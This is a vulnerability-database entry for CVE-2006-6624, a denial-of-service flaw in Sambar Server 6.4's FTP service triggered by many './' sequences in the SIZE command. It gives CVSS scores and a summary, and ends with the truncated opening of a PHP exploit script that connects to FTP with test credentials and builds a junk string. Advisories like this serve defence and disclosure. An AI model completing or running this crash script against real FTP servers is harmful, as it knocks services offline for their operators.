4
CVSSv2

CVE-2006-6624

Published: 18/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

The FTP Server in Sambar Server 6.4 allows remote authenticated users to cause a denial of service (application crash) via a long series of "./" sequences in the SIZE command.

Vulnerable Product Search on Vulmon Subscribe to Product

sambar sambar server 6.4

Exploits

<?php # Sambar FTP Server 64 SIZE Denial Of Service # by rgod # mail: retrog at alice dot it # site: retrogodaltervistaorg # tested on WinXP sp2 error_reporting(E_ALL); $service_port = getservbyname('ftp', 'tcp'); $address = gethostbyname('19216813'); $user="test"; $pass="test"; $junk=""; for ($i=1; $i<=160; $i++){ $jun ...